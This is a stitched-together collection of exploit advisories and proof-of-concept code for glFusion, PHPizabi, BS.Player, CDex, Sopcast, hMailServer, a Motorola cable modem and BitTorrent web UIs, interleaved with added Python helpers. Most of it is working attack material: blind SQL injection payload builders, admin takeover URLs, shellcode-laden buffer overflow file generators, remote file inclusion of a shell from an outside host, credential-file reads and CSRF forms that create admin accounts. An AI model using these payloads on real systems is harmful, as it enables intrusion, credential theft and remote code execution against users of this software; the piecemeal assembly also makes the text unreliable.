$order_sql = ' ORDER BY ' . $ord . ' ' . strtoupper($this->_sort_arr['direction']);
...

The filters are inefficient: see COM_applyFilter(), which calls COM_applyBasicFilter()
in /public/lib-common.php near line 5774. We are in an ORDER clause and the vars are
not surrounded by quotes; bad chars are e.g. <, >, /, ', ;, \, ,, *, ` but what about
spaces and ( ... you can use a CASE WHEN .. THEN .. ELSE .. END construct instead of
e.g. IF(..,..,..), -- instead of /* to close your query, and e.g. the alternative
syntax SUBSTR(str FROM n FOR n) instead of SUBSTR(str,n,n) in a sub-SELECT statement.
Other attacks are possible: COM_applyFilter() is used very widely.

Additional notes: the 'direction' argument is uppercased by strtoupper(); you know
that table identifiers are case sensitive on Unix-like systems but not on MS Windows,
so I chose to inject into the 'order' one for better results. The vars come from
the $_REQUEST[] array, so you can pass them through $_POST[] or $_COOKIE[] too,
which I suppose is not intended.

This exploit extracts the hash from the users table; also note that you do not
need to crack the hash, you can authenticate as admin with the cookie:

glfusion=[uid]; glf_password=[hash];

and as admin you can upload php files into public folders!

Very soft mitigations: glFusion does not show the table prefix in sql errors; the
default however is 'gl_', and I prepared a fast routine to extract it from the
information_schema db if available. To successfully interrogate MySQL you need at
least 2 records in the same topic section; the default installation, however,
creates 2 links with topic glFusion.
*/

$err[0]="[!] This script is intended to be launched from the cli!";
$err[1]="[!] You need the curl extension loaded!";

if (php_sapi_name() <> "cli") {
    die($err[0]);
}

if (!extension_loaded('curl')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
    if ($win) {
        !dl("php_curl.dll") ? die($err[1]) : null;
    } else {
        !dl("php_curl.so") ? die($err[1]) : null;
    }
}

function syntax(){
    global $argv;
    print ("Syntax: php ".$argv[0]." [host] [path] [[port]] [OPTIONS] \n".
           "Options: \n".
           "--port:[port]         - specify a port \n".
           "                        default - 80 \n".
           "--prefix              - try to extract table prefix from information.schema\n".
           "                        default - gl_ \n".
           "--uid:[n]             - specify an uid other than default (2, usually admin)\n".
           "--proxy:[host:port]   - use proxy \n".
           "--enforce             - try even with 'not vulnerable' message ");
    die();
}

error_reporting(E_ALL ^ E_NOTICE);

$host=$argv[1];
$path=$argv[2];
$prefix="gl_"; //default
$uid=2;
$where="uid=$uid"; //user id, usually admin, anonymous = 1
$argv[2] ? print("[*] Attacking...\n") : syntax();
$_f_prefix=false;
$_use_proxy=false;
$port=80;
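Comma-free payload construction for both glFusion injections on this page (the glf_session cookie reaching SESS_updateSessionTime(), and the ?order= parameter in listfactory), as an added example that is not the advisory's exploit code. The filter model assumes COM_applyFilter() simply deletes the characters the advisory lists; against that model a textbook payload comes out mangled, while one written with CASE WHEN ... END, BETWEEN, SUBSTR(x FROM n FOR 1) and hex literals in place of quoted strings passes through unchanged. Column names title and date for the ORDER BY flip, the gl_ prefix and uid 2 are assumptions.

```python
import re

FILTERED = set("<>/';\\,*`")  # characters the advisory lists; assumed to be deleted outright


def com_apply_filter(value):
    """Model of COM_applyFilter() as described on this page: drop the listed characters."""
    return "".join(ch for ch in value if ch not in FILTERED)


def survives_filter(payload):
    """True when the filter returns the payload byte-for-byte, i.e. the SQL arrives intact."""
    return com_apply_filter(payload) == payload


def hex_literal(text):
    """MySQL hex string literal ('a' -> 0x61): compares as a string and needs no quotes."""
    return "0x" + text.encode().hex()


def _digit_probe(pos, lo, hi, uid, prefix):
    # SUBSTR(... FROM n FOR 1) and BETWEEN give a range test with neither commas nor < >.
    sub = f"(SELECT SUBSTR(passwd FROM {pos} FOR 1) FROM {prefix}users WHERE uid={uid})"
    return f"{sub} BETWEEN {hex_literal(lo)} AND {hex_literal(hi)}"


def order_payload(pos, lo, hi, uid=2, prefix="gl_"):
    """?order= value: sort by title when the hash digit at pos is in [lo, hi], else by
    date. The answer is read from which of two known rows is listed first, which is
    why the advisory needs at least two records in the same topic."""
    return f"CASE WHEN {_digit_probe(pos, lo, hi, uid, prefix)} THEN title ELSE date END"


def cookie_payload(sess_id, pos, lo, hi, delay=3, uid=2, prefix="gl_"):
    """glf_session cookie value for the time-based variant. The integer prefix keeps
    SESS_getUserIdFromSession() resolving the session; the tail is evaluated inside
    SESS_updateSessionTime()'s unquoted WHERE (sess_id = $sessid), where AND binds
    looser than =, so SLEEP() fires only for the matching row."""
    return (f"{sess_id} AND CASE WHEN {_digit_probe(pos, lo, hi, uid, prefix)} "
            f"THEN SLEEP({delay}) ELSE 0 END")


def mysql_int_prefix(text):
    """How MySQL reads a string in an integer comparison: the leading integer, else 0."""
    m = re.match(r"\s*([+-]?\d+)", text)
    return int(m.group(1)) if m else 0


# The shape a payload would take without the filter; kept for the comparison.
NAIVE_ORDER = "(SELECT IF(SUBSTR(passwd,1,1)='a',title,date) FROM gl_users WHERE uid=2)"
```

Driving a full extraction with these builders is the binary search shown for the Geeklog blocks[] hole earlier on this page; only the oracle differs (row order for ?order=, response time for the cookie).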
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)
by Nine:Situations:Group::bookoo

our site: http://retrogod.altervista.org/
software site: http://www.phpizabi.net/

vulnerability: sql injection in /theme/default/proc.inc.php

<?php
function bufferProcParse($buffer) {
    global $CONF;
    $tpl = new template;
    $tpl -> LoadThis($buffer);

    // HANDLE POSTED NOTEPAD DATA ///
    if (isset($_GET["notepad_body"])) {
        myQ("UPDATE `[x]users` SET `notepad_body` = '".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");
        me("flush");
    }
..

note the urldecode() ...

exploitation, manual:

injection urls:

change username and password of an existing user:

[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*

which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%2527/*

grant yourself admin rights:

[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/*

which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/*

navigate:

http://host/path_to_phpizabi/?L=admin.index

boom! now go to:

http://host/path_to_phpizabi/?L=admin.cms.edit&id={cms.file}

use this opening and closing tag style, example:

<script language="php"> system("ls -la"); </script>

(it is always available, see: http://www.php.net/manual/en/language.basic-syntax.phpmode.php)
because of that preg_replace() in /modules/admin/cms/edit.php:

..
if (isset($_POST["Submit"])) {
    if ($handle = fopen("modules/cms/{$_GET[id]}.php", "w")) {
        $body = "<?php if (!defined(\"CORE_STRAP\")) die(); ?>\n"
              . preg_replace('#(<\\?.*\\?>)|(<%.*%>)|<\\?php|<\\?|\\?>|<%|%>#si', NULL, stripslashes($_POST["body"][0]))
              . "\n<!-- Edited by ".me("username")." on ".date($CONF["LOCALE_HEADER_DATE_TIME"])." -->";
        fwrite($handle, $body);
        fclose($handle);
..

which is bypassed. Save changes and navigate:

http://host/path_to_phpizabi/?L=cms._cms_file_

to see the output... now visit the log page:

http://192.168.0.1/phpizabi/?L=admin.logs.logs

..

original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html
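Why %2527 turns into a quote, as an added example (not PHPizabi code): PHP percent-decodes the query string once when it fills $_GET, and proc.inc.php then calls urldecode() on the value a second time, so a check that runs after the first decode (magic_quotes_gpc, a quote blacklist, a WAF rule) sees only the harmless %27. The helpers reproduce both stages and canonicalize() decodes until the value stops changing, which is the normalization a detection rule needs before matching; the request URL is the first one from the advisory, the marker match is deliberately crude.

```python
from urllib.parse import parse_qs, unquote, urlsplit


def php_get(query):
    """First decode: what PHP puts into $_GET (one level of percent-decoding)."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def php_get_param(url, name):
    """Value of one $_GET parameter as PHP sees it for the given URL ('' if absent)."""
    return php_get(urlsplit(url).query).get(name, "")


def phpizabi_notepad_value(url):
    """Second decode: proc.inc.php's urldecode() applied to $_GET['notepad_body'].
    This is the string that lands inside the UPDATE statement."""
    return unquote(php_get_param(url, "notepad_body"))


def canonicalize(value, max_rounds=5):
    """Decode repeatedly until stable; returns (decoded, rounds_needed).
    rounds_needed >= 2 is itself a strong signal: legitimate clients do not
    double-encode form data."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def looks_like_sqli(value):
    """Crude marker match: a quote break-out followed by a comment or clause keyword.
    Meant to be run on the canonical form, not on the raw parameter."""
    v = value.lower()
    return "'" in v and ("/*" in v or "--" in v or " where " in v or " union " in v)
```

Run looks_like_sqli() on the raw $_GET value and the advisory's request is invisible; run it on canonicalize()'s output and it is caught, which is the whole point of normalizing before matching.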
Bs.Player <= 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh)
<?php
/*
Bs.Player <= 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh)
by Nine:Situations:Group::pyrokinesis

Overlong hostnames in bsplayer playlist files cause eax and the seh handler to
be overwritten. Cannot reliably debug with olly because of code compression;
I just used faultmon/memdump/msfpescan and chose the easy/universal way with seh.
There are some pop ret addresses in common among the vulnerable versions...
Well, it says local but I consider it a remote one because .bsl files are
associated with the program.

Tested and working against:
v2.32 Build 975 Free
v2.34 Build 980 PRO
win xp pro sp2 / sp3
win 2k3 sp1

not vulnerable:
v2.35 Build 985 PRO
V2.36 Build 990 Free/Pro
*/

$buffer= "\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46".
"\x3a\x30\x2c\x41\x41\x41\x41\x0d\x0a\x68\x74\x74\x70\x3a\x2f\x2f".
"\x52\x61\x77\x2d\x48\x69\x67\x68\x2e";

$nop1=str_repeat("\x90",384);
$eax_again="";
$nop2=str_repeat("\x90",12);
$eax="";
$nop3=str_repeat("\x90",8);
$jnk=$nop1.$eax_again.$nop2.$eax.$nop3;
$jmp="\xeb\x08\x90\x90";
$seh="\xb1\xad\x41\x00"; //0x0041adb1 pop pop ret bsplayer.exe
$nop4=str_repeat("\x90",100);

// win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
$scode=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x47".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x57\x32\x42\x42\x42\x32".
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x59\x79\x4b\x4c\x69".
"\x78\x37\x34\x67\x70\x45\x50\x75\x50\x6c\x4b\x61\x55\x45\x6c\x6e".
"\x6b\x71\x6c\x73\x35\x62\x58\x66\x61\x6a\x4f\x4c\x4b\x42\x6f\x56".
"\x78\x4c\x4b\x71\x4f\x77\x50\x57\x71\x6a\x4b\x72\x69\x6e\x6b\x75".
"\x64\x4e\x6b\x75\x51\x68\x6e\x30\x31\x59\x50\x4d\x49\x4c\x6c\x4f".
"\x74\x69\x50\x31\x64\x36\x67\x4f\x31\x4a\x6a\x44\x4d\x75\x51\x68".
"\x42\x38\x6b\x5a\x54\x35\x6b\x62\x74\x75\x74\x37\x74\x70\x75\x68".
"\x65\x4c\x4b\x51\x4f\x35\x74\x73\x31\x4a\x4b\x50\x66\x6c\x4b\x44".
"\x4c\x50\x4b\x6c\x4b\x41\x4f\x77\x6c\x34\x41\x7a\x4b\x6c\x4b\x67".
"\x6c\x6e\x6b\x37\x71\x6a\x4b\x4d\x59\x33\x6c\x71\x34\x54\x44\x39".
"\x53\x55\x61\x6f\x30\x41\x74\x6c\x4b\x37\x30\x70\x30\x6e\x65\x4b".
"\x70\x61\x68\x66\x6c\x6e\x6b\x61\x50\x36\x6c\x6e\x6b\x74\x30\x65".
"\x4c\x6e\x4d\x6c\x4b\x71\x78\x64\x48\x68\x6b\x76\x69\x6c\x4b\x4f".
"\x70\x48\x30\x75\x50\x75\x50\x55\x50\x4e\x6b\x63\x58\x67\x4c\x31".
"\x4f\x56\x51\x4a\x56\x53\x50\x41\x46\x4f\x79\x4b\x48\x4b\x33\x39".
"\x50\x61\x6b\x32\x70\x53\x58\x6c\x30\x4c\x4a\x65\x54\x53\x6f\x63".
"\x58\x7a\x38\x49\x6e\x4e\x6a\x54\x4e\x70\x57\x69\x6f\x58\x67\x62".
"\x43\x72\x41\x70\x6c\x70\x63\x43\x30\x47";

$buffer.=$jnk.$jmp.$seh.$nop4.$scode;
$buffer.= "\x56\x37\x2e\x46\x4d\x2f\x6c\x69\x73\x74\x65\x6e\x2e\x70".
"\x6c\x73\x0d\x0a\x00";

$fp=fopen("evil.bsl","w+");
if (!$fp) {die("cannot create evil.bsl!");}
@fputs($fp,$buffer);
@fclose($fp);
?>

original url: http://retrogod.altervista.org/9sg_bsplayer_seh.html
CDex v1.70b2 (.ogg) local buffer overflow exploit poc
<?PHP
/*
CDex v1.70b2 (.ogg) local buffer overflow exploit poc (win xp sp3)
by Nine:Situations:Group::Pyrokinesis

software site: http://cdexos.sourceforge.net/
our site: http://retrogod.altervista.org/

A very reliable buffer overflow exists in the way CDex processes Ogg Vorbis headers.

usage: c:\php\php 9sg_cdex_local.php
evil.ogg is created; now navigate:
Main Menu -> Tools -> Media file Player -> Select files -> Browse to a folder -> Open -> Play evil.ogg
*/

$_frgmnt1 = "OggS". //for what I understood ... beginning
"\x00". //stream_structure_version
"\x02". //header_type_flag
"\x00\x00\x00\x00\x00\x00\x00\x00". //granular_position
"\x66\x07\x00\x00". //bitstream_serial_number
"\x00\x00\x00\x00". //page_sequence_number
"\x92\xa8\x3b\xd9". //CRC_checksum
"\x01". //number_page_segments
"\x1e". //segments_table
"\x01". "vorbis".
"\x00\x00\x00\x00\x02\x44\xac\x00\x00\x00\x00\x00\x00".
"\x00\x71\x02\x00\x00\x00\x00\x00\xb8\x01";

$_frgmnt2 = "OggS".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x66\x07".
"\x00\x00\x01\x00\x00\x00".
"\x00\x00\x00\x00". //set crc to 0, after calculate the real crc
"\x51\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\x93\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\x03vorbis\x1d\x00\x00".
"\x00Xiph.Org\x20libVor".
"bis\x20I\x2020040629\x03\x00".
"\x00\x00\x07\x20\x00\x00".
"ARTIST=";

$payload_len=8192;

//msg box shellcode saying hey ...
//replace with your own, the script recalculates the CRC checksum
$scode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a".
"\xbb\x7b\x1d\x80\x7c". //LoadLibraryA at 0x7c801d7b in kernel32.dll xpsp3
"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50".
"\xbb\x30\xae\x80\x7c". //GetProcAddress at 0x7c80ae30 in kernel32.dll
"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51".
"\x51\x52\xff\xd0\x31\xd2\x50".
"\xb8\xfa\xca\x81\x7c". //ExitProcess at 0x7c81cafa in kernel32.dll
"\xff\xd0\xe8\xc4\xff".
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff".
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff".
"\xff\x48\x65\x79\x4e";

$_boom=str_repeat("\x90",2048 - strlen($scode)).$scode.
"\x67\x86\x86\x7c". //eip - 0x7C868667 call esp kernel32.dll
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x83\xec\x7f". // sub esp,07f
"\x83\xec\x7f". //..
"\x83\xec\x7f". //..
"\x83\xec\x7f". //..
"\x83\xec\x7f". //..
"\xff\xd4". //call esp
"\x90\x90\x90".
"\x00\x00\x00\x00"; //if replaced with non-zero chars, overwrites seh ... do not touch

$_frgmnt2.=$_boom."\x90\x90\x90\x90\x90\x90\x90\x90".str_repeat("\x90",$payload_len - strlen($_boom) - 8);
$_frgmnt2.="\x0a\x20\x00\x00". "PERFORMER=";
$_frgmnt2.=str_repeat("\x90",$payload_len);
$_frgmnt2.="\x09\x00\x00\x00". "DATE=2009".
"\x01\x05". "vorbis".
"\x29\x42\x43\x56\x01\x00\x08\x00\x00\x00\x31\x4c\x20\xc5\x80\xd0".
"\x90\x55\x00\x00\x10\x00\x00".
"\x60\x24\x29\x0e\x93\x66\x49\x29\xa5".
"\x94\xa1\x28\x79\x98\x94\x48\x49\x29\xa5\x94\xc5\x30\x89\x98\x94".
"\x89\xc5\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x20".
"\x34\x64\x15\x00\x00\x04\x00\x80\x28\x09\x8e\xa3\xe6\x49\x6a\xce".
"\x39\x67\x18\x27\x8e\x72\xa0\x39\x69\x4e\x38\xa7\x20\x07\x8a\x51".
"\xe0\x39\x09\xc2\xf5\x26\x63\x6e\xa6\xb4\xa6\x6b\x6e\xce\x29\x25".
"\x08\x0d\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21".
"\x85\x14\x62\x88\x21\x86\x18\x62\x88\x21\x87\x1c\x72\xc8\x21\xa7".
"\x9c\x72\x0a\x2a\xa8\xa0\x82\x0a\x32\xc8\x20\x83\x4c\x32\xe9\xa4".
"\x93\x4e\x3a\xe9\xa8\xa3\x8e\x3a\xea\x28\xb4\xd0\x42\x0b\x2d\xb4".
"\xd2\x4a\x4c\x31\xd5\x56\x63\xae\xbd\x06\x5d\x7c\x73\xce\x39\xe7".
"\x9c\x73\xce\x39\xe7\x9c\x73\xce\x09\x42\x43\x56\x01\x00\x20\x00".
"\x00\x04\x42\x06\x19\x64\x10\x42\x08\x21\x85\x14\x52\x88\x29\xa6".
"\x98\x72\x0a\x32\xc8\x80\xd0\x90\x55\x00\x00\x20\x00\x80\x00\x00".
"\x00\x00\x47\x91\x14\x49\xb1\x14\xcb\xb1\x1c\xcd\xd1\x24\x4f\xf2".
"\x2c\x51\x13\x35\xd1\x33\x45\x53\x54\x4d\x55\x55\x55\x55\x75\x5d".
"\x57\x76\x65\xd7\x76\x75\xd7\x76\x7d\x59\x98\x85\x5b\xb8\x7d\x59".
"\xb8\x85\x5b\xd8\x85\x5d\xf7\x85\x61\x18\x86\x61\x18\x86\x61\x18".
"\x86\x61\xf8\x7d\xdf\xf7\x7d\xdf\xf7\x7d\x20\x34\x64\x15\x00\x20".
"\x01\x00\xa0\x23\x39\x96\xe3\x29\xa2\x22\x1a\xa2\xe2\x39\xa2\x03".
"\x84\x86\xac\x02\x00\x64\x00\x00\x04\x00\x20\x09\x92\x22\x29\x92".
"\xa3\x49\xa6\x66\x6a\xae\x69\x9b\xb6\x68\xab\xb6\x6d\xcb\xb2\x2c".
"\xcb\xb2\x0c\x84\x86\xac\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00".
"\x00\xa0\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a".
"\xa6\x69\x9a\xa6\x69\x9a\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65".
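The page walker and checksum behind a file like evil.ogg, as an added example (not CDex code and not the advisory's generator). The PoC writes zeros into the CRC field and recomputes it afterwards; this is that computation (CRC-32 with polynomial 0x04c11db7, unreflected, zero initial value, no final XOR, taken over the whole page with the CRC field zeroed) together with a parser for the 27-byte page header and lacing table, so an oversized comment page like the one above can be built or checked. The sample page is constructed; it reuses the PoC's serial number 0x0766 and vendor string.

```python
import struct

OGG_POLY = 0x04C11DB7
_TABLE = []
for _i in range(256):
    _r = _i << 24
    for _ in range(8):
        _r = (((_r << 1) ^ OGG_POLY) if _r & 0x80000000 else (_r << 1)) & 0xFFFFFFFF
    _TABLE.append(_r)


def ogg_crc(data):
    """Ogg page checksum: CRC-32, poly 0x04c11db7, unreflected, init 0, no xorout."""
    crc = 0
    for b in data:
        crc = ((crc << 8) & 0xFFFFFFFF) ^ _TABLE[((crc >> 24) ^ b) & 0xFF]
    return crc


HEADER = struct.Struct("<4sBBqIIIB")  # capture, version, flags, granule, serial, seq, crc, nsegs
HEADER_LEN = HEADER.size              # 27


def build_page(body, serial, seq, flags=0, granule=0):
    """Single-packet page: lacing values of 255 then the remainder (a 0 when the body
    is an exact multiple of 255); CRC computed with the field zeroed, then patched in."""
    segs = [255] * (len(body) // 255) + [len(body) % 255]
    if len(segs) > 255:
        raise ValueError("body needs more than 255 lacing values; split across pages")
    head = HEADER.pack(b"OggS", 0, flags, granule, serial, seq, 0, len(segs))
    page = head + bytes(segs) + body
    return page[:22] + struct.pack("<I", ogg_crc(page)) + page[26:]


def parse_page(buf, offset=0):
    """Decode one page at offset and verify its CRC; 'end' is the next page's offset."""
    if len(buf) - offset < HEADER_LEN:
        raise ValueError("truncated header")
    capture, version, flags, granule, serial, seq, crc, nsegs = HEADER.unpack_from(buf, offset)
    if capture != b"OggS":
        raise ValueError("bad capture pattern")
    lace_start = offset + HEADER_LEN
    lacing = buf[lace_start:lace_start + nsegs]
    if len(lacing) != nsegs:
        raise ValueError("truncated lacing table")
    body_start = lace_start + nsegs
    body_len = sum(lacing)
    body = buf[body_start:body_start + body_len]
    if len(body) != body_len:
        raise ValueError("truncated body")
    end = body_start + body_len
    zeroed = buf[offset:offset + 22] + b"\x00" * 4 + buf[offset + 26:end]
    return {"version": version, "flags": flags, "granule": granule, "serial": serial,
            "seq": seq, "crc": crc, "crc_ok": ogg_crc(zeroed) == crc,
            "lacing": list(lacing), "body": body, "end": end}


def vorbis_comment_packet(vendor, comments):
    """Vorbis comment header (packet type 3): vendor string, comment list, framing bit."""
    out = b"\x03vorbis" + struct.pack("<I", len(vendor)) + vendor + struct.pack("<I", len(comments))
    for c in comments:
        out += struct.pack("<I", len(c)) + c
    return out + b"\x01"


def oversized_comment_page(field=b"ARTIST", size=8192, serial=0x0766, seq=1):
    """Constructed test page in the spirit of the PoC: one huge comment field of NOPs."""
    pkt = vorbis_comment_packet(b"Xiph.Org libVorbis I 20040629", [field + b"=" + b"\x90" * size])
    return build_page(pkt, serial=serial, seq=seq)
```

A decoder that validates the CRC will reject a hand-edited page, which is why the PoC has to recompute it; parse_page() reports crc_ok so the same check can be used in triage before a sample is trusted to have reached the parsing code at all.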
Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc
<!--
Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc
by Nine:Situations:Group::surfista (IE7/8)

our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/

Through the SetExternalPlayer() method and the ExternalPlayer property it is
possible to associate an arbitrary executable with the external player button
(for clarity see http://www.sopcast.com/docs/ where the player control buttons
are shown), which opens Windows Media Player by default. When the user clicks
this button, the executable is launched without any prompt. This value is also
stored in config.xml, inside the sopcast local folder, for further use, e.g. by
the sopcast client application.

Note: this control is marked safe for scripting and safe for initialization
-->
<HTML>
<HEAD>
<script language="Javascript" type="text/JavaScript">
window.onload=function() {
    SopPlayer.InitPlayer();
    //SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
    SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
    SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
    SopPlayer.SetChannelName("CCTV5");
    SopPlayer.Play();
}
</script>
</HEAD>
<BODY>
<OBJECT ID="SopPlayer" name="SopPlayer" CLASSID="clsid:8FEFF364-6A5F-4966-A917-A3AC28411659" HEIGHT="375" WIDTH="375"></OBJECT>
</BODY>
</HTML>

original url: http://retrogod.altervista.org/9sg_sopcastia.html
Re: Re: Google Chrome Browser (ChromeHTML://) remote parameter injection POC
Attack vector is Internet Explorer 7/8b against a system with a coexistent google chrome installation. It works exactly like this: http://www.milw0rm.com/exploits/7181
hMAilServer 4.4.2 (PHPWebAdmin) local remote file inclusion
hMAilServer 4.4.2 (PHPWebAdmin) local remote file inclusion poc
by Nine:Situations:Group::strawdog
our site: http://retrogod.altervista.org
software site: http://www.hmailserver.com/
description: http://en.wikipedia.org/wiki/HMailServer
google dork: PHPWebAdmin for hMailServer intitle:PHPWebAdmin -site:hmailserver.com -dork

poc:

regardless of register_globals / magic_quotes_gpc:
http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../../boot.ini%00
http://hostname/path_to_webadmin/index.php?page=background/../../Bin/hMailServer.INI%00
http://hostname/path_to_webadmin/index.php?page=background/../../MySQL/my.ini%00
http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../.. /../Program+Files/hmailserver/Bin/hmailserver.ini%00

with register_globals = on:
(prepare a functions.php folder on somehost.com with an index.html with your shell inside on a php enabled server, otherwise a functions.php shell on a php disabled one)
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/cmd=dir

with register_globals = on, magic_quotes_gpc = off:
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\boot.ini%00
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/shell.txt%00cmd=dir
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\Program+Files\hMailServer\Bin\hMailServer.INI%00
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=../Bin/hMailServer.INI%00

The Bin folder can be found in a different location; disclose the path by simply calling:
http://hostname/path_to_webadmin/initialize.php

interesting file: hMailServer.INI - contains two interesting fields:
- the Administrator password encrypted with md5,
- by having knowledge of that you can calculate the MySQL root password, specified in the password field.
You can do this by using the /Addons/Utilities/DecryptBlowfish.vbs script (*)

vulnerable code, index.php:

<?php
error_reporting(E_ALL);
if (!file_exists("config.php")) {
    echo "Please rename config-dist.php to config.php. The file is found in the PHPWebAdmin root folder.";
    die;
}
require_once("config.php");
require_once("initialize.php");
set_error_handler("ErrorHandler");
if (is_php5())
    set_exception_handler("ExceptionHandler");
$page = hmailGetVar("page");
if ($page == "")
    $page = "frontpage";
$isbackground = (substr($page, 0, 10) == "background");
if ($isbackground)
    $page = "$page.php";
else
    $page = "hm_$page.php";
// Check that the page really exists.
$page = stripslashes($page);
if (!file_exists($page))
    hmailHackingAttemp();
// If it's a background page, run here.
if ($isbackground) {
    include $page; //<-- !!!
    // Page is run, die now.
    die;
}
..

for clarity, here is the hmailGetVar() function in /include/functions.php:
..
function hmailGetVar($p_varname, $p_defaultvalue = null)
{
    $retval = $p_defaultvalue;
    if (isset($_GET[$p_varname])) {
        $retval = $_GET[$p_varname];
    } else if (isset($_POST[$p_varname])) {
        $retval = $_POST[$p_varname];
    } else if (isset($_REQUEST[$p_varname])) {
        $retval = $_REQUEST[$p_varname];
    }
    if (get_magic_quotes_gpc())
        $retval = stripslashes($retval);
    return $retval;
}
..

so the page argument can be passed by $_GET[], $_POST[] or $_COOKIE[] arrays. Note the stripslashes(), which disables magic_quotes_gpc on every argument passed.

(**) initialize.php:
..
$hmail_config['rootpath'] = str_replace("\\", "/", $hmail_config['rootpath']);
$hmail_config['includepath'] = str_replace("\\", "/", $hmail_config['includepath']);
$hmail_config['temppath'] = str_replace("\\", "/", $hmail_config['temppath']);
require_once($hmail_config['includepath'] . "functions.php");
..
Sea-Surfing on the Motorola Surfboard
More information about this flaw can be found here: http://www.rooksecurity.com/blog/?p=4

Motorola Surfboard Cable Modems suffer from two Denial of Service attacks by means of Cross Site Request Forgery. The latest version of the Motorola Surfboard is affected at the time of writing.

Restarts the modem:

<html>
<form id="1" method="post" action="http://192.168.100.1/configdata.html">
<input name="BUTTON_INPUT" value="Restart+Cable+Modem">
</form>
</html>
<script>document.getElementById("1").submit();</script>

This CSRF will disconnect the user from the internet for longer. The process to get back online from a factory default condition could take from 5 to 30 minutes.

<html>
<form id="2" method="post" action="http://192.168.100.1/configdata.html">
<input name="BUTTON_INPUT" value="Reset+All+Defaults">
</form>
</html>
<script>document.getElementById("2").submit();</script>

Peace
BitTorrent Clients and CSRF
The following are proof of concept exploits against three bittorrent clients: uTorrent's WebUI, Azureus's HTML WebUI, and TorrentFlux. More information: http://www.rooksecurity.com/blog/?p=10

TorrentFlux v2.3 (Latest) http://sourceforge.net/projects/torrentflux/

If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here: http://localhost/torrentflux_2.3/html/downloads/USER_NAME/ You do not have to know a password to access this folder, but you will have to know the username.

<html>
<form id='file_attack' method=post action="http://localhost/torrentflux_2.3/html/index.php">
<input type=hidden name=url_upload value="http://localhost/backdoor.php.torrent">
<input type=submit value='file attack'>
</form>
</html>
<script>document.getElementById('file_attack').submit();</script>

Add an administrative account:

<html>
<form id=create_admin method=post action="http://localhost/torrentflux_2.3/html/admin.php?op=addUser">
<input type=hidden name=newUser value=sadmin>
<input type=hidden name="pass1" value=password>
<input type=hidden name="pass2" value=password>
<input type=hidden name=userType value=1>
<input type=submit value="create admin">
</form>
</html>
<script>document.getElementById('create_admin').submit();</script>

